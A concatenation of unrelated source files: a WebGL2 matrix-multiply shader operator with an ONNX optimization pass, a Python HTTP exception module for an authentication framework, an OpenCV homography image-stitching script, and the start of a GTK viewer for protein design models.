dimsB: ReadonlyArray<number>
) {
/*
*Matmulの出力shape、入力stride計算
*行列Bが転置状態かつ4chで入ってくる場合
*matmul((a,b,m,k), (a,b,n,k)) => (a,b,m,n)
*
*a, bの部分は2個に限らず0~無限個の次元がつけられる。
*2行列で各次元のサイズは一致が必要。
*broadcastingあり。次元数が少ない側には先頭にサイズ1の次元が付与。
*そのうえでサイズ1とそれ以外のサイズがある場合にそれ以外のサイズに合わせbroadcast
*
*一方の入力が1次元の場合の特例。
*(k), (a,b,n,k) => (a,b,n)
*(k)を(a,b,1,k)にbroadcastしたうえで計算して、(a,b,1,n)を得て、1の軸を消して(a,b,n)
*
*(a,b,m,k), (k) => (a,b,m)
*(k)を(a,b,1,k)にbroadcastしたうえで計算して、(a,b,m,1)を得て、1の軸を消して(a,b,m)
*
*両方1次元だと、単純な内積で(1,1)を得て1の軸2つが消え、0次元のスカラー値。
*/
// 出力の次元数(1次元の場合の特例適用前)
const totalNDims = Math.max(dimsA.length, dimsB.length, 2),
expandedDimsA = dimsA.slice();
if (expandedDimsA.length === 0) {
throw new Error();
} else if (expandedDimsA.length === 1) {
expandedDimsA.unshift(1);
}
while (expandedDimsA.length < totalNDims) {
expandedDimsA.unshift(1);
}
const expandedDimsB = dimsB.slice();
if (expandedDimsB.length === 0) {
throw new Error();
} else if (expandedDimsB.length === 1) {
expandedDimsB.unshift(1);
}
while (expandedDimsB.length < totalNDims) {
expandedDimsB.unshift(1);
}
const resultDims = [
expandedDimsA[expandedDimsA.length - 2],
expandedDimsB[expandedDimsB.length - 2],
],
innerProductLength = expandedDimsA[expandedDimsA.length - 1];
if (innerProductLength !== expandedDimsB[expandedDimsB.length - 1]) {
throw new Error();
}
const stridesA = calcStrides(expandedDimsA),
stridesB = calcStrides(expandedDimsB);
for (let i = expandedDimsA.length - 3; i >= 0; i--) {
const resultDim = Math.max(expandedDimsA[i], expandedDimsB[i]);
// Broadcastされた次元はstrideは0 (出力サイズ1の次元でも0にしてOK)
if (expandedDimsA[i] === 1) {
stridesA[i] = 0;
}
if (expandedDimsB[i] === 1) {
stridesB[i] = 0;
}
resultDims.unshift(resultDim);
}
// B is 4ch
for (let i = 0; i < stridesB.length; i++) {
stridesB[i] /= 4;
}
const resultDimsAfterSqueeze = resultDims.slice();
if (dimsA.length === 1) {
resultDimsAfterSqueeze.splice(resultDimsAfterSqueeze.length - 2, 1);
}
if (dimsB.length === 1) {
resultDimsAfterSqueeze.splice(resultDimsAfterSqueeze.length - 1, 1);
}
return {
resultDims,
resultDimsAfterSqueeze,
stridesA,
stridesB,
innerProductLength,
};
}
async run(context: WebDNNWebGLContext, inputs: Tensor[]): Promise<Tensor[]> {
context.assertsWebGLTensorArray(inputs);
const inputA = inputs[0],
inputB = inputs[1];
if (!context.webgl2) {
throw new Error("This operator can only run on WebGL2");
}
if (inputA.dataType !== "float32" || inputB.dataType !== "float32") {
throw new Error("only float32 is supported");
}
if (inputA.dimPerPixel !== 1 || inputB.dimPerPixel !== 4) {
throw new Error();
}
const {
resultDims,
resultDimsAfterSqueeze,
stridesA,
stridesB,
innerProductLength,
} = this.calcShapeNT141(inputA.dims, inputB.dims),
output = context.emptyTensor(resultDimsAfterSqueeze, "float32");
console.dir(this.calcShapeNT141(inputA.dims, inputB.dims));
if (resultDims.length === 2) {
await this.calcDim2(
context,
inputA,
inputB,
output,
resultDims,
stridesA,
stridesB,
innerProductLength
);
} else if (resultDims.length === 3) {
await this.calcDim3(
context,
inputA,
inputB,
output,
resultDims,
stridesA,
stridesB,
innerProductLength
);
} else {
// TODO: 4次元以上のサポート
throw new Error();
}
return [output];
}
private async calcDim2(
context: WebDNNWebGLContext,
dA: WebGLTensor,
dB: WebGLTensor,
dC: WebGLTensor,
resultDims: number[],
stridesA: ReadonlyArray<number>,
stridesB: ReadonlyArray<number>,
innerProductLength: number
) {
const kernelSource = `${shaderGenHeader(context.webgl2)}
#define innerProductLengthDiv4 ${innerProductLength / 4}
${shaderGenTensorOutputUniform(resultDims.length)}
uniform sampler2D tex_input_a;
uniform int tex_input_a_stride_0;
uniform int tex_input_a_stride_1;
ivec2 get_coord_a(int d0) {
int flat_index = d0 * tex_input_a_stride_0;
int texture_w = textureSize(tex_input_a, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
uniform sampler2D tex_input_b;
uniform int tex_input_b_stride_0;
uniform int tex_input_b_stride_1;
ivec2 get_coord_b(int d0) {
int flat_index = d0 * tex_input_b_stride_0;
int texture_w = textureSize(tex_input_b, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
void main() {
${shaderGenTensorOutputCoordsWithReturn(resultDims.length)}
float s = 0.0;
ivec2 c_a = get_coord_a(tex_output_0);
ivec2 c_b = get_coord_b(tex_output_1);
int texture_w_a = textureSize(tex_input_a, 0).x;
int texture_w_b = textureSize(tex_input_b, 0).x;
for (int ip = 0; ip < innerProductLengthDiv4; ip++) {
vec4 vec_a;
vec_a.r = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.g = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.b = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.a = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec4 vec_b = texelFetch(tex_input_b, c_b, 0);
s += dot(vec_a, vec_b);
c_b.x += 1;
if (c_b.x >= texture_w_b) {
c_b = ivec2(c_b.x - texture_w_b, c_b.y + 1);
}
}
${shaderGenOutput("s", context.webgl2)}
return;
}
`,
kernelName = `matmulnt141_2_${innerProductLength}`;
context.addKernel(kernelName, kernelSource);
const uniforms: WebGLUniformItem[] = [
...shaderGenTensorNDGetUniformItem(
"tex_input_a",
stridesA,
dA,
context.webgl2
),
...shaderGenTensorNDGetUniformItem(
"tex_input_b",
stridesB,
dB,
context.webgl2
),
...shaderGenTensorOutputUniformItem(resultDims, dC, context.webgl2),
];
await context.runKernel(
kernelName,
[
{ tensor: dA, name: "tex_input_a" },
{ tensor: dB, name: "tex_input_b" },
],
dC,
uniforms
);
}
private async calcDim3(
context: WebDNNWebGLContext,
dA: WebGLTensor,
dB: WebGLTensor,
dC: WebGLTensor,
resultDims: number[],
stridesA: ReadonlyArray<number>,
stridesB: ReadonlyArray<number>,
innerProductLength: number
) {
const kernelSource = `${shaderGenHeader(context.webgl2)}
#define innerProductLengthDiv4 ${innerProductLength / 4}
${shaderGenTensorOutputUniform(resultDims.length)}
uniform sampler2D tex_input_a;
uniform int tex_input_a_stride_0;
uniform int tex_input_a_stride_1;
uniform int tex_input_a_stride_2;
ivec2 get_coord_a(int d0, int d1) {
int flat_index = d0 * tex_input_a_stride_0 + d1 * tex_input_a_stride_1;
int texture_w = textureSize(tex_input_a, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
uniform sampler2D tex_input_b;
uniform int tex_input_b_stride_0;
uniform int tex_input_b_stride_1;
uniform int tex_input_b_stride_2;
ivec2 get_coord_b(int d0, int d1) {
int flat_index = d0 * tex_input_b_stride_0 + d1 * tex_input_b_stride_1;
int texture_w = textureSize(tex_input_b, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
void main() {
${shaderGenTensorOutputCoordsWithReturn(resultDims.length)}
float s = 0.0;
ivec2 c_a = get_coord_a(tex_output_0, tex_output_1);
ivec2 c_b = get_coord_b(tex_output_0, tex_output_2);
int texture_w_a = textureSize(tex_input_a, 0).x;
int texture_w_b = textureSize(tex_input_b, 0).x;
for (int ip = 0; ip < innerProductLengthDiv4; ip++) {
vec4 vec_a;
vec_a.r = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.g = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.b = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.a = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec4 vec_b = texelFetch(tex_input_b, c_b, 0);
s += dot(vec_a, vec_b);
c_b.x += 1;
if (c_b.x >= texture_w_b) {
c_b = ivec2(c_b.x - texture_w_b, c_b.y + 1);
}
}
${shaderGenOutput("s", context.webgl2)}
return;
}
`,
kernelName = `matmulnt141_3_${innerProductLength}`;
context.addKernel(kernelName, kernelSource);
if (stridesA[2] > dA.textureWidth || stridesB[2] > dB.textureWidth) {
throw new Error("MatMul: kernel assumption does not hold");
}
const uniforms: WebGLUniformItem[] = [
...shaderGenTensorNDGetUniformItem(
"tex_input_a",
stridesA,
dA,
context.webgl2
),
...shaderGenTensorNDGetUniformItem(
"tex_input_b",
stridesB,
dB,
context.webgl2
),
...shaderGenTensorOutputUniformItem(resultDims, dC, context.webgl2),
];
await context.runKernel(
kernelName,
[
{ tensor: dA, name: "tex_input_a" },
{ tensor: dB, name: "tex_input_b" },
],
dC,
uniforms
);
}
}
export function getOpEntries(): OperatorEntry[] {
return [
{
opType: "MatMulNT141",
backend: "webgl",
opsetMin: 1,
factory: () => new MatMulNT141(),
},
];
}
"""
class PassMatMulTransposeWebGL2(OptimizationPass):
def optimize(self, model: onnx.ModelProto) -> Optional[OptimizationPassResult]:
graph = model.graph
changed = False
result = OptimizationPassResultWebGL()
for node in graph.node:
if node.op_type == "MatMul":
rhs_name = node.input[1]
initializers = graph.initializer
optimizable = False
rhs_array = None
rhs_initializer = None
for initializer in initializers:
if initializer.name == rhs_name:
rhs_array = tensor_proto_to_numpy(initializer)
rhs_array_shape = rhs_array.shape
if len(rhs_array_shape) < 2 or rhs_array_shape[-2] % 4 != 0:
continue
optimizable = True
rhs_initializer = initializer
break
if not optimizable:
continue
initializers.remove(rhs_initializer)
changed = True
# optimize it to MatMulNT141
node.op_type = "MatMulNT141"
# add hint to use RGBA texture for weight
result.tensor_move_options[rhs_name] = {"dimPerPixel": 4}
# move inner-product axis to last
transposed_rhs_array = np.moveaxis(rhs_array, -2, -1)
result.initializers[rhs_name] = transposed_rhs_array
result.operator_shaders["matmulnt141"] = OperatorShaderWebGL(SHADER_CODE)
# TODO: check weight is not used by other operator
return result if changed else None
|
from werkzeug.exceptions import HTTPException
class LowballException(HTTPException):
"""
Base exception class for Lowball Exceptions
"""
# Treat all exceptions as 500 unless explicitly overwritten
code = 500
# Handle Generic Exceptions
description = "An Error Occurred. Please Check the Logs For Additional Data"
# Since we are overwriting the base init class fulfilling the need of setting the response to None
response = None
def __init__(self, additional_log_data=None):
"""
Initialize a Lowball Exception
:param additional_log_data: additional data that can be placed in the logs but not shown to the user
"""
# Set the optional Additional Log Data that is not shown to the user
self.additional_log_data = additional_log_data
class InvalidTokenLifetimeException(LowballException):
code = 400 # Bad Request
description = "The Requested Lifetime for the Token Is Not In Range"
class NoAuthHeaderException(LowballException):
code = 400 # Bad Request
description = "No token provided with request"
class InvalidAuthHeaderException(LowballException):
code = 400 # Bad Request
description = "Authorization header improperly formatted"
class RequestNotJSONException(LowballException):
code = 400 # Bad Request
description = "Ill formatted request, the expected body was of type JSON"
class InvalidTokenException(LowballException):
code = 401 # Unauthorized
description = "Token Is Invalid"
class MalformedTokenIdException(LowballException):
code = 400
description = "Invalid token id format"
class ExpiredTokenException(LowballException):
code = 401 # Unauthorized
description = "Token Has Expired"
class InadequateRolesException(LowballException):
code = 401 # Unauthorized
description = "Current Token Has Inadequate Roles for Requested Action"
class AuthenticationNotInitializedException(LowballException):
code = 503 # Service Unavailable
description = "No Authentication Provider Present"
class InvalidCredentialsException(LowballException):
code = 401 # Unauthorized
description = "Invalid credentials supplied"
class MalformedAuthPackageException(LowballException):
code = 400 # Bad Request
description = "The Authentication Request Did Not Supply The Required Data"
class MalformedProviderPackageException(LowballException):
code = 400 # Bad Request
description = "The Request Did Not Supply The Required Data for the Auth Provider"
class NoAuthenticationDatabaseException(LowballException):
code = 503
description = "No authentication database configured for this application"
class InvalidAuthDataException(LowballException):
description = "Unable to create token. The authentication provider returned an unrecognized response."
class InvalidRequestingUserException(LowballException):
description = "Attempted to create a token with an invalid requesting user"
class InvalidTokenLifeException(LowballException):
description = "Attempted to create a token where expiration is greater than configured max token life"
class ListTokensInvalidReturnTypeException(LowballException):
description = "auth_db.list_tokens did not return a list as expected"
class ListClientsInvalidReturnTypeException(LowballException):
description = "auth_provider.list_clients did not return a list of client data objects as expected"
class ListTokensInvalidTokenInListException(LowballException):
description = "auth_db.list_tokens returned a list that included a non-Token object"
class TokenNotFoundException(LowballException):
code = 404
description = "Specified token not found"
class BadRequestException(LowballException):
code = 400
def __init__(self, description, additional_log_data=None):
super(BadRequestException, self).__init__(additional_log_data)
self.description = description
class InternalServerErrorException(LowballException):
code = 500
def __init__(self, description, additional_log_data=None):
super(InternalServerErrorException, self).__init__(additional_log_data)
self.description = description
class NotFoundException(LowballException):
code = 404
def __init__(self, description, additional_log_data=None):
super(NotFoundException, self).__init__(additional_log_data)
self.description = description
class NotImplementedException(LowballException):
code = 501
def __init__(self, function, additional_log_data=None):
super(NotImplementedException, self).__init__(additional_log_data)
self.description = f"{function} not implemented"
LOWBALL_EXCEPTIONS = [
LowballException,
InvalidTokenException,
NoAuthHeaderException,
InvalidAuthHeaderException,
RequestNotJSONException,
InvalidTokenException,
ExpiredTokenException,
InadequateRolesException,
AuthenticationNotInitializedException,
InvalidCredentialsException,
MalformedAuthPackageException,
NoAuthenticationDatabaseException,
MalformedProviderPackageException,
MalformedTokenIdException,
ListClientsInvalidReturnTypeException
]
__all__ = [
"LowballException",
"InvalidTokenLifetimeException",
"NoAuthHeaderException",
"InvalidAuthHeaderException",
"RequestNotJSONException",
"InvalidTokenException",
"ExpiredTokenException",
"InadequateRolesException",
"AuthenticationNotInitializedException",
"InvalidCredentialsException",
"MalformedAuthPackageException",
"NoAuthenticationDatabaseException",
"LOWBALL_EXCEPTIONS",
"InvalidAuthDataException",
"InvalidRequestingUserException",
"InvalidTokenLifeException",
"ListTokensInvalidTokenInListException",
"ListTokensInvalidReturnTypeException",
"TokenNotFoundException",
"BadRequestException",
"InternalServerErrorException",
"NotFoundException",
"NotImplementedException",
"MalformedProviderPackageException",
"MalformedTokenIdException",
"ListClientsInvalidReturnTypeException"
]
|
<gh_stars>1-10
import sys
if '/opt/ros/kinetic/lib/python2.7/dist-packages' in sys.path:
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
import cv2 as cv
import cv2
import imutils
import numpy as np
def detectAndDescribe(image):
# convert the image to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
descriptor = cv2.xfeatures2d.SIFT_create()
(kps, features) = descriptor.detectAndCompute(image, None)
# convert the keypoints from KeyPoint objects to NumPy
# arrays
kps = np.float32([kp.pt for kp in kps])
# return a tuple of keypoints and features
return (kps, features)
def matchKeypoints(kpsA, kpsB, featuresA, featuresB, ratio, reprojThresh):
# compute the raw matches and initialize the list of actual
# matches
matcher = cv2.DescriptorMatcher_create("BruteForce")
rawMatches = matcher.knnMatch(featuresA, featuresB, 2)
matches = []
# loop over the raw matches
for m in rawMatches:
# ensure the distance is within a certain ratio of each
# other (i.e. Lowe's ratio test)
if len(m) == 2 and m[0].distance < m[1].distance * ratio:
matches.append((m[0].trainIdx, m[0].queryIdx))
# computing a homography requires at least 4 matches
if len(matches) > 4:
# construct the two sets of points
ptsA = np.float32([kpsA[i] for (_, i) in matches])
ptsB = np.float32([kpsB[i] for (i, _) in matches])
# compute the homography between the two sets of points
(H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC,
reprojThresh)
# return the matches along with the homograpy matrix
# and status of each matched point
return (matches, H, status)
# otherwise, no homograpy could be computed
return None
concat_img = cv2.imread('/home/khg/Python_proj/SFA3D/dataset/veloster/training/front_image/000000.png')
h, total_w, c = concat_img.shape
w = int(total_w/3)
imageA = concat_img[:, :w, :]
imageB = concat_img[:, w:2*w, :]
fr_img = concat_img[:, 2*w:, :]
(kpsA, featuresA) = detectAndDescribe(imageA)
(kpsB, featuresB) = detectAndDescribe(imageB)
# match features between the two images
ratio=0.75
reprojThresh=4.0
M = matchKeypoints(kpsA, kpsB, featuresA, featuresB, ratio, reprojThresh)
(matches, H, status) = M
cv2.imshow('ori_img', imageA)
print(H)
result = cv2.warpPerspective(imageA, H, (2*imageA.shape[1], 2*imageA.shape[0]))
cv2.imshow('asdf',result)
result[0:imageB.shape[0], 0:imageB.shape[1]] = imageB
cv2.imshow('test',result)
cv2.waitKey(0)
# fl_img = cv2.resize(fl_img, (int(w/4), int(h/4)))
# front_img = cv2.resize(front_img, (int(w/4), int(h/4)))
# fr_img = cv2.resize(fr_img, (int(w/4), int(h/4)))
# # cv2.imshow('left', fl_img)
# # cv2.imshow('front', front_img)
# # cv2.imshow('right', fr_img)
# cv2.setNumThreads(1)
# modes = (cv2.Stitcher_PANORAMA, cv2.Stitcher_SCANS)
# imgs = [fl_img, front_img, fr_img]
# stitcher = cv2.createStitcher()
# status, pano = stitcher.stitch(imgs)
# # print(statue)
# # cv2.imshow('test', pano)
# # cv2.waitKey(0)
# FLANN_INDEX_LSH = 6
# def anorm2(a):
# return (a*a).sum(-1)
# def anorm(a):
# return np.sqrt( anorm2(a) )
# def matchKeypoints(keyPoints1, keyPoints2, descriptors1, descriptors2):
# flann_params= dict(algorithm = FLANN_INDEX_LSH,
# table_number = 6, # 12
# key_size = 12, # 20
# multi_probe_level = 1) #2
# matcher = cv.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
# raw_matches = matcher.knnMatch(descriptors1, descriptors2, k = 2) #2
# matches = []
# for m in raw_matches:
# if len(m) == 2 and m[0].distance < m[1].distance * 0.79:
# matches.append((m[0].trainIdx, m[0].queryIdx))
# if len(matches) >= 4:
# keyPoints1 = np.float32([keyPoints1[i] for (_, i) in matches])
# keyPoints2 = np.float32([keyPoints2[i] for (i, _) in matches])
# H, status = cv.findHomography(keyPoints1, keyPoints2, cv.RANSAC,4.0)
# print('%d / %d inliers/matched' % (np.sum(status), len(status)))
# else:
# H, status = None, None
# print('%d matches found, not enough for homography estimation' % len(p1))
# return matches, H, status
# def drawMatches(image1, image2, keyPoints1, keyPoints2, matches, status):
# h1, w1 = image1.shape[:2]
# h2, w2 = image2.shape[:2]
# img_matching_result = np.zeros((max(h1, h2), w1 + w2, 3), dtype="uint8")
# img_matching_result[0:h2, 0:w2] = image2
# img_matching_result[0:h1, w2:] = image1
# for ((trainIdx, queryIdx), s) in zip(matches, status):
# if s == 1:
# keyPoint2 = (int(keyPoints2[trainIdx][0]), int(keyPoints2[trainIdx][1]))
# keyPoint1 = (int(keyPoints1[queryIdx][0]) + w2, int(keyPoints1[queryIdx][1]))
# cv.line(img_matching_result, keyPoint1, keyPoint2, (0, 255, 0), 1)
# return img_matching_result
# def main():
# # img1 = cv.imread('.\\images\\B.jpg')
# # img2 = cv.imread('.\\images\\A.jpg')
# concat_img = cv.imread('/home/khg/Python_proj/SFA3D/dataset/veloster/training/front_image/000000.png')
# h, total_w, c = concat_img.shape
# w = int(total_w/3)
# img1 = concat_img[:, :w, :]
# img2 = concat_img[:, w:2*w, :]
# fr_img = concat_img[:, 2*w:, :]
# gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)
# gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)
# detector = cv.BRISK_create()
# keyPoints1, descriptors1 = detector.detectAndCompute(gray1, None)
# keyPoints2, descriptors2 = detector.detectAndCompute(gray2, None)
# print('img1 - %d features, img2 - %d features' % (len(keyPoints1), len(keyPoints2)))
# keyPoints1 = np.float32([keypoint.pt for keypoint in keyPoints1])
# keyPoints2 = np.float32([keypoint.pt for keypoint in keyPoints2])
# matches, H, status = matchKeypoints(keyPoints1, keyPoints2, descriptors1, descriptors2)
# img_matching_result = drawMatches(img1, img2, keyPoints1, keyPoints2, matches, status)
# result = cv.warpPerspective(img1, H,
# (img1.shape[1] + img2.shape[1], img1.shape[0]))
# result[0:img2.shape[0], 0:img2.shape[1]] = img2
# cv.imshow('result', result)
# cv.imshow('matching result', img_matching_result)
# cv.waitKey(0)
# print('Done')
# if __name__ == "__main__":
# main()
# cv.destroyAllWindows()
|
<filename>roseasy/gui.py
#!/usr/bin/env python2
# encoding: utf-8
"""\
Judge forward-folded candidates in computational protein design pipelines.
Usage:
show_my_designs.py [options] <pdb_directories>...
show_my_designs.py --version
Options:
-F, --no-fork
Do not fork into a background process.
-f, --force
Force the cache to be regenerated.
-q, --quiet
Build the cache, but don't launch the GUI.
-v, --version
Print the version number and exit.
Features:
1. Extract quality metrics from forward-folded models and plot them against
each other in any combination.
2. Easily visualize specific models by right-clicking on plotted points.
Add your own visualizations by writing `*.sho' scripts.
3. Plot multiple designs at once, for comparison purposes.
4. Keep notes on each design, and search your notes to find the designs you
want to visualize.
"""
## Imports
from gi import pygtkcompat
pygtkcompat.enable()
pygtkcompat.enable_gtk(version='3.0')
import collections, glob, gzip, os, re, shutil, subprocess, sys
import matplotlib
matplotlib.use('GTK3Agg')
from gi.repository import Gtk as gtk
from gi.repository import Pango as pango
from gi.repository import GObject as gobject
from gi.repository import Gdk as gdk
import yaml
import matplotlib.pyplot as plt, numpy as np, scipy as sp, pandas as pd, seaborn as sns
from matplotlib.figure import Figure
from matplotlib.backends.backend_gtk3agg import FigureCanvasGTK3Agg
from matplotlib.backends.backend_gtk3 import NavigationToolbar2GTK3
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
from pprint import pprint
from roseasy import structures
class Design (object):
def __init__(self, directory, use_cache=True):
self.directory = directory
self.cache_path = os.path.join(directory, 'models.pkl')
self.notes_path = os.path.join(directory, 'notes.txt')
self.rep_path = os.path.join(directory, 'representative.txt')
self._models = None
self._metrics = {}
self._notes = ""
self._representative = None
self._load_models(use_cache)
self._load_annotations()
def __str__(self):
return '<ModelGroup dir={}>'.format(self.directory)
def __len__(self):
return len(self.paths)
@property
def paths(self):
return self._models['path']
@property
def notes(self):
return self._notes
@notes.setter
def notes(self, notes):
self._notes = notes
self._save_notes()
@property
def representative(self):
if self._representative is None:
return self.get_metric('total_score').idxmin()
else:
return self._representative
@representative.setter
def representative(self, index):
self._representative = index
self._save_representative()
@property
def representative_path(self):
return self.paths[self.representative]
@property
def metrics(self):
return self._metrics
def get_metric(self, metric):
if metric not in self.metrics:
message = "No such metric: '{}'\n".format(metric)
message += "Defined metrics are: " + ', '.join(
"'{}'".format(x) for x in self.metrics)
print(type(metric), ' '.join(str(type(x)) for x in self.metrics))
raise RuntimeError(message)
return self._models[metric]
def get_coord(self, x_metric, y_metric, index=None):
i = index if index is not None else self.representative
return self.get_metric(x_metric)[i], self.get_metric(y_metric)[i]
def _load_models(self, use_cache):
"""
Load a variety of score and distance metrics for the structures found
in the given directory. As much information as possible will be
cached. Note that new information will only be calculated for file
names that haven't been seen before. If a file changes or is deleted,
the cache will not be updated to reflect this and you may be presented
with stale data.
"""
self._models, self._metrics = structures.load(
self.directory,
use_cache=use_cache,
require_io_dir=False,
)
def _load_metrics(self):
# Treat column in self._models that contains numeric data as a metric.
# Any dtype other than 'object' is assumed to be numeric.
self._metrics = {
x: MetricInfo(
x,
title=get_metric_title(x, self),
order=get_metric_order(x, self),
guide=get_metric_guide(x, self),
limits=get_metric_limits(x, self),
)
for x in list(self._models.keys())
if self._models[x].dtype != 'object'
}
# Make sure at least two metrics have been associated with each model
# in this directory.
if len(self._metrics) == 0:
raise IOError("no metrics defined for the models in '{}'".format(self.directory))
if len(self._metrics) == 1:
name = next(iter(self._metrics))
raise IOError("only found one metric '{}' for the models in '{}', need at least two".format(name, self.directory))
def _load_annotations(self):
try:
with open(self.notes_path) as file:
self._notes = file.read()
except IOError:
pass
try:
with open(self.rep_path) as file:
self._representative = int(file.read())
except IOError:
pass
def _save_notes(self):
with open(self.notes_path, 'w') as file:
file.write(self.notes)
if os.path.exists(self.notes_path) and not self.notes:
os.remove(self.notes_path)
def _save_representative(self):
if self._representative is not None:
with open(self.rep_path, 'w') as file:
file.write(str(self._representative))
elif os.path.exists(self.rep_path):
os.remove(self.rep_path)
class ShowMyDesigns (gtk.Window):
def __init__(self, designs, normalize_to_all=True):
# Setup the parent class.
gtk.Window.__init__(self)
self.normalize_to_all = normalize_to_all
self.add_events(gdk.EventMask.KEY_PRESS_MASK)
self.connect('key-press-event', self.on_hotkey_press)
self.set_icon_from_file(os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'icon.png'))
# Setup the data members.
self.designs = designs
self.keys = list()
self.selected_model = None
self.is_legend_visible = False
self.is_representative_visible = False
self.is_model_count_visible = False
self.metrics = {
k: next(iter(self)).metrics[k] \
for k in set.intersection(*[set(x.metrics) for x in self])
}
print(self.metrics)
self.sorted_metrics = sorted(
self.metrics,
key=lambda k: (self.metrics[k].order, self.metrics[k].title)
)
print(self.sorted_metrics)
self.x_metric = (
default_x_metric
if default_x_metric in self.metrics
else self.sorted_metrics[0])
self.y_metric = (
default_y_metric
if default_y_metric in self.metrics
else self.sorted_metrics[1])
# Setup the GUI.
self.connect('destroy', lambda x: gtk.main_quit())
self.set_default_size(int(1.618 * 630), 630)
menu_bar = self.setup_menu_bar()
model_viewer = self.setup_model_viewer()
vbox = gtk.VBox()
vbox.pack_start(menu_bar, False)
vbox.pack_end(model_viewer, True)
self.add(vbox)
self.set_border_width(3)
self.update_everything()
self.show_all()
self.set_focus(None)
n = len(self.designs)
self.hide_model_list() if n == 1 else self.show_model_list()
self.hide_filter_pane()
self.show_annotation_pane()
self.hide_legend()
self.show_representative()
self.hide_model_count()
def __iter__(self):
return iter(list(self.designs.values()))
def setup_menu_bar(self):
bar = gtk.MenuBar()
# The "File" menu:
menu = gtk.Menu()
item = gtk.MenuItem("_File")
item.set_submenu(menu)
bar.append(item)
item = gtk.MenuItem("Save selected paths")
item.connect('activate', lambda _: self.save_selected_paths())
menu.append(item)
item = gtk.MenuItem("Save selected funnels")
item.connect('activate', lambda _: self.save_selected_funnels())
menu.append(item)
# The "View" menu:
menu = gtk.Menu()
item = gtk.MenuItem("_View")
item.set_submenu(menu)
bar.append(item)
item = self.model_list_toggle = gtk.CheckMenuItem("Model list")
item.connect('activate', self.on_toggle_model_list)
menu.append(item)
item = self.filter_pane_toggle = gtk.CheckMenuItem("Filter pane")
item.connect('activate', self.on_toggle_filter_pane)
menu.append(item)
item = self.annotation_pane_toggle = gtk.CheckMenuItem("Annotation pane")
item.connect('activate', self.on_toggle_annotation_pane)
menu.append(item)
item = gtk.SeparatorMenuItem()
menu.append(item)
item = self.legend_toggle = gtk.CheckMenuItem("Legend")
item.connect('activate', self.on_toggle_legend)
menu.append(item)
item = self.representative_toggle = gtk.CheckMenuItem("Representative")
item.connect('activate', self.on_toggle_representative)
menu.append(item)
item = self.model_count_toggle = gtk.CheckMenuItem("Model count")
item.connect('activate', self.on_toggle_model_count)
menu.append(item)
return bar
def setup_model_viewer(self):
plot = self.setup_plot()
self.model_list = self.setup_model_list()
self.filter_pane = self.setup_filter_pane()
self.annotation_pane = self.setup_annotation_pane()
self.sidebar = gtk.VPaned()
self.sidebar.add1(self.model_list)
self.sidebar.add2(self.filter_pane)
bottombar = gtk.VPaned()
bottombar.add1(plot)
bottombar.add2(self.annotation_pane)
viewer = gtk.HPaned()
viewer.add1(self.sidebar)
viewer.add2(bottombar)
return viewer
def setup_model_list(self):
list_store = gtk.ListStore(str)
text = gtk.CellRendererText()
icon = gtk.CellRendererPixbuf()
self.view = gtk.TreeView(list_store)
self.view.set_model(list_store)
self.view.set_rubber_banding(True)
self.view.set_enable_search(False)
self.view.set_headers_visible(False)
columns = [
('Name', 'directory'),
]
for index, parameters in enumerate(columns):
title, attr = parameters
def cell_data_func(column, cell, model, iter, attr): #
key = model.get_value(iter, 0)
design = self.designs[key]
text = getattr(design, attr)
cell.set_property('text', text)
def sort_func(model, iter_1, iter_2, attr): #
key_1 = model.get_value(iter_1, 0)
key_2 = model.get_value(iter_2, 0)
design_1 = self.designs[key_1]
design_2 = self.designs[key_2]
value_1 = getattr(design_1, attr)
value_2 = getattr(design_2, attr)
return cmp(value_1, value_2)
list_store.set_sort_func(index, sort_func, attr);
column = gtk.TreeViewColumn(title, text)
column.set_cell_data_func(text, cell_data_func, attr)
column.set_sort_column_id(index)
self.view.append_column(column)
selector = self.view.get_selection()
selector.connect("changed", self.on_select_designs)
### If selection is weird, double check this!
### gtk.SelectionMode(3) should correspond to GTK_SELECTION_MULTIPLE
selector.set_mode(gtk.SelectionMode(3))
scroller = gtk.ScrolledWindow()
scroller.set_policy(gtk.PolicyType.AUTOMATIC,
gtk.PolicyType.AUTOMATIC)
scroller.add(self.view)
frame = gtk.Frame()
frame.add(scroller)
self.search_form = gtk.Entry()
self.search_form.set_icon_from_stock(gtk.EntryIconPosition.SECONDARY, gtk.STOCK_FIND)
search_buffer = self.search_form.get_buffer()
